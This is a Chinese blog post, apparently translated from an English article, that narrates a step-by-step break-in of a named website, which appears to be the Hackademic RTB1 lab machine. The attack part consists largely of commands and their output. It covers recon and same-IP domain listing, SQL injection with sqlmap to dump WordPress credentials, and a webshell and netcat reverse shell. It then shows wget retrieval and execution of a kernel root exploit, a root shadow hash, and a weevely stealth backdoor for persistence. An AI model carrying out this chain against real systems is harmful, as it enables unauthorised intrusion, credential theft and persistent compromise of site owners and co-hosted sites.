国外黑客们的入侵网站思路

问题的答案看起来不那么确定,显而易见的是黑掉一个站点有很多种方法。在这篇文章,我们的目标是要给大家展示一下黑客是如何锁定并黑掉一个目标站点的!

让我们来看看目标站点:hack-test.com

hack

先ping下站点所在服务器的IP:

hack

现在我们有了目标站点所在服务器的IP了 — 173.236.138.113

然后我们可以找找同个IP上的其他站点(旁站:sameip.org):

hack

Same IP   26 sites hosted on IP Address 173.236.138.113

ID Domain Site Link
1 hijackthisforum.com hijackthisforum.com
2 sportforum.net sportforum.net
3 freeonlinesudoku.net freeonlinesudoku.net
4 cosplayhell.com cosplayhell.com
5 videogamenews.org videogamenews.org
6 gametour.com gametour.com
7 qualitypetsitting.net qualitypetsitting.net
8 brendanichols.com brendanichols.com
9 8ez.com 8ez.com
10 hack-test.com hack-test.com
11 kisax.com kisax.com
12 paisans.com paisans.com
13 mghz.com mghz.com
14 debateful.com debateful.com
15 jazzygoodtimes.com jazzygoodtimes.com
16 fruny.com fruny.com
17 vbum.com vbum.com
18 wuckie.com wuckie.com
19 force5inc.com force5inc.com
20 virushero.com virushero.com
21 twincitiesbusinesspeernetwork.com twincitiesbusinesspeernetwork.com
22 jennieko.com jennieko.com
23 davereedy.com davereedy.com
24 joygarrido.com joygarrido.com
25 prismapp.com prismapp.com
26 utiligolf.com utiligolf.com

总计有26个站点在[173.236.138.113]这台服务器上。为了黑掉目标站点,许多黑客会把目标站点同服的其他站点也划入攻击范围内。但是出于学习的目的,我们今天暂且将其他站点放在一边。

我们需要更多关于目标站点的信息(Ps:笔者认为在渗透测试过程中,这比实施测试的环节来得重要得多。),他们包括:

1.DNS记录(A,NS,TXT,MX)

2.WEB服务类型(IIS,APACHE,TOMCAT)

3.域名注册者的信息(所持有域名公司等)

4.目标站点管理员(相关人员)的姓名,电话,邮箱和住址等

5.目标站点所支持的脚本类型(PHP,ASP,JSP,ASP.net,CFM)

6.目标站点的操作系统(UNIX,LINUX,WINDOWS,SOLARIS)

7.目标站点开放的端口

让我们先来查询相关DNS记录吧,这里用的是 who.is:

hack

目标站点DNS记录信息:

Record Type TTL Priority Content
hack-test.com A 4 hours 173.236.138.113 ()
hack-test.com SOA 4 hours ns1.dreamhost.com. hostmaster.dreamhost.com. 2011032301 15283 1800 1814400 14400
hack-test.com NS 4 hours ns1.dreamhost.com
hack-test.com NS 4 hours ns3.dreamhost.com
hack-test.com NS 4 hours ns2.dreamhost.com
www.hack-test.com A 4 hours 173.236.138.113 ()

同时确认WEB服务的类型:

hack

显而易见是Apache ,稍后我们将确定其版本:

HACK-TEST.COM SITE INFORMATION

IP: 173.236.138.113

Website Status: active

Server Type: Apache

Alexa Trend/Rank:  1 Month: 3,213,968    3 Month: 2,161,753 Page Views per Visit:  1 Month: 2.0    3 Month: 3.7

现在是时候来查询目标站点持有人(也许可能就是管理员)信息了:

hack

现在我们有了管理员的一些相关信息了,祭出Backtrack5中的神器 Whatweb 来确认操作系统和WEB服务版本信息:

h

hack

Now we found that your site is using a famous php script called WordPress, that your server os is Fedora Linux and that your web server version is (apache 2.2.15), let’s find open ports in your server.

现在我们知道,目标站点使用了用PHP编写的非常出名的开源博客系统WordPress,并且是跑在Fedora的Linux发行版上的,Apache版本是2.2.15。接下来让我们看看目标站点服务器开了哪些端口:

祭出神器Nmap

1 – 获取目标服务器开放的服务

root@bt:/# nmap -sV hack-test.com
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-12-28 06:39 EET
Nmap scan report for hack-test.com (192.168.1.2)
Host is up (0.0013s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd 2.2.15 ((Fedora))
MAC Address: 00:0C:29:01:8A:4D (VMware)
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.56 seconds

2 – 获取目标服务器操作系统

root@bt:/# nmap -O hack-test.com 

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-12-28 06:40 EET
Nmap scan report for hack-test.com (192.168.1.2)
Host is up (0.00079s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE
22/tcp closed ssh 

80/tcp open http
MAC Address: 00:0C:29:01:8A:4D (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.22 (Fedora Core 6)
Network Distance: 1 hop 

OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.42 seconds

啊哦!~只开了80,而且是 Fedora Core 6 Linux内核版本为2.6.22

现在我们已经收集了很多关于目标站点的重要信息了。让我们扫扫他的漏洞吧。(Sql injection – Blind sql injection – LFI – RFI – XSS – CSRF,等等.)

让我们先试试 Nakto.pl 来扫扫,没准能搞出点漏洞来

root@bt:/pentest/web/nikto# perl nikto.pl -h http://hack-test.com
- Nikto v2.1.4
—————————————————————————
+ Target IP: 192.168.1.2 + Target Hostname: hack-test.com + Target Port: 80 + Start Time: 2011-12-29 06:50:03
—————————————————————————
+ Server: Apache/2.2.15 (Fedora) + ETag header found on server, inode: 12748, size: 1475, mtime: 0x4996d177f5c3b + Apache/2.2.15 appears to be outdated (current is at least Apache/2.2.17). Apache 1.3.42 (final release) and 2.0.64 are also current. + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST + OSVDB-3268: /icons/: Directory indexing found. + OSVDB-3233: /icons/README: Apache default file found. + 6448 items checked: 1 error(s) and 6 item(s) reported on remote host + End Time: 2011-12-29 06:50:37 (34 seconds)
—————————————————————————

hack

同时试试Wa3f(Ps:哦哇谱死的开源项目,很不错的说~)

root@bt:/pentest/web/w3af# ./w3af_gui 

Starting w3af, running on:
Python version:
2.6.5 (r265:79063, Apr 16 2010, 13:57:41)
[GCC 4.4.3]
GTK version: 2.20.1
PyGTK version: 2.17.0 

w3af - Web Application Attack and Audit Framework
Version: 1.2
Revision: 4605
Author: Andres Riancho and the w3af team.

hack

图形界面的扫描方式,写入URL即可。

hack

用以前给杂志社投稿的语气说,泡杯茶的功夫,等待扫描结束并查看结果。

hack

你可以看到很多漏洞信息鸟~先试试SQL注入。

hack

url – http://hack-test.com/Hackademic_RTB1/?cat=d%27z%220 然后 Exploit it!

hack

发现其他漏洞测试失败,用SQLMap进行脱裤吧(猜解数据库并保存目标站点相关信息到本地)  Dump it!

sqlmap -u url

hack

过一小会儿能见到如下信息

hack

按n并回车后你可以看到

hack

哦也~显错方式的注入点,而且爆出的 Mysql的版本信息

用sqlmap取得所有库,参数 -dbs
hack

找到三个库

hack

查Wordpress的库中所有表,参数 -D wordpress -tables

hack

然后是列名(这里需要你自己熟悉敏感信息存在哪个表中呢),参数 -T wp_users -columns

hack

22个字段(列)

hack

然后查数据,参数 -C user_login,user_pass –dump

hack

然后解密管理员的hash,这里用的是 http://www.onlinehashcrack.com/free-hash-reverse.php

hack

明文密码是q1w2e3(和csdn库的密码排行榜有得一拼,哈哈~),然后登入后台拿webshell了。

hack

Get in!~

hack

来传个PHP的webshell吧~这里用的编辑插件拿shell的方法(见我以前写的tips,方法有很多哦~)

hack

hack

牛b。保存就可以了。然后访问就可以看到可爱的webshell了。

hack

灰阔都知道,接下来要提权了。用反弹来获取一个交互式的shell。

hack

本地用nc监听(不得不说经典就是经典啊~)

hack

连上之后

hack

输点Linux命令试试火候

id uid=48(apache) gid=489(apache) groups=489(apache)

pwd /var/www/html/Hackademic_RTB1/wp-content/plugins

uname -a Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45 EST 2009 i686 i686 i386 GNU/Linux

hack

命令作用我就不翻译了。获取了内核版本,我们可以到 exploit-db.com 来寻找相关的exp进行权限的提升。

老外都是用wget下载的,国内灰阔们呢?

wget http://www.exploit-db.com/download/15285 -O roro.c
--2011-12-28 00:48:01-- http://www.exploit-db.com/download/15285
Resolving www.exploit-db.com... 199.27.135.111, 199.27.134.111
Connecting to www.exploit-db.com|199.27.135.111|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://www.exploit-db.com/download/15285/ [following]
--2011-12-28 00:48:02-- http://www.exploit-db.com/download/15285/
Connecting to www.exploit-db.com|199.27.135.111|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7154 (7.0K) [application/txt]
Saving to: `roro.c' 

0K ...... 100% 29.7K=0.2s

hack
代码我不贴了。用gcc编译exp gcc roro.c -o roro ,编译并且执行exp。

./roro 

[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved rds_proto_ops to 0xe09f0b20
[+] Resolved rds_ioctl to 0xe09db06a
[+] Resolved commit_creds to 0xc044e5f1
[+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting function pointer...
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved rds_proto_ops to 0xe09f0b20
[+] Resolved rds_ioctl to 0xe09db06a
[+] Resolved commit_creds to 0xc044e5f1
[+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...

淡定,敲个id试试,你可以发现 root it!

hack

现在可以查看shadow和passwd了~(我只截了部分)

cat /etc/shadow
root:$6$4l1OVmLPSV28eVCT$FqycC5mozZ8mqiqgfudLsHUk7R1EMU/FXw3pOcOb39LXekt9VY6HyGkXcLEO.ab9F9t7BqTdxSJvCcy.iYlcp0:14981:0:99999:7:::

我们可以使用 John the ripper 来破哈希。但是我们不会这么做,通常我们会留下一个后门(权限巩固),这样就可以随时涂掉他首页了(hv a joke.)。

我们用bt5中的weevely来上传一个带密码保护的PHP的webshell。

1 – weevely的相关选项

root@bt:/pentest/backdoors/web/weevely# ./main.py - 

Weevely 0.3 - Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/ 

Usage: main.py [options] 

Options:
-h, --help show this help message and exit
-g, --generate Generate backdoor crypted code, requires -o and -p .
-o OUTPUT, --output=OUTPUT
Output filename for generated backdoor .
-c COMMAND, --command=COMMAND
Execute a single command and exit, requires -u and -p
.
-t, --terminal Start a terminal-like session, requires -u and -p .
-C CLUSTER, --cluster=CLUSTER
Start in cluster mode reading items from the give
file, in the form 'label,url,password' where label is
optional.
-p PASSWORD, --password=PASSWORD
Password of the encrypted backdoor . 

-u URL, --url=URL Remote backdoor URL .

2 – 用它来创建一个PHP的webshell

 root@bt:/pentest/backdoors/web/weevely# ./main.py -g -o hax.php -p koko 

Weevely 0.3 - Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/ 

+ Backdoor file 'hax.php' created with password 'koko'.

hack
3 – 上传

hack

我们现在可以用weevely连接并操控他了。

hack

测试(其实就相当于一句话马差不多的..)

hack

91ri.org评:老外的行文方式还不错,很好的渗透流程,很标准的科普文~~顺便补充 虽然我对文中wordperss能有sql注射表示费解 因为暂时极少听说存在sql注射(插件除外) 不过应该还是有版本存在的 这个不能说没有。毕竟人写的东西总是会有疏漏的。本文仅仅是为了给大家拓宽思路 希望大家喜欢!

标签: 无
返回文章列表 文章二维码
本页链接的二维码
打赏二维码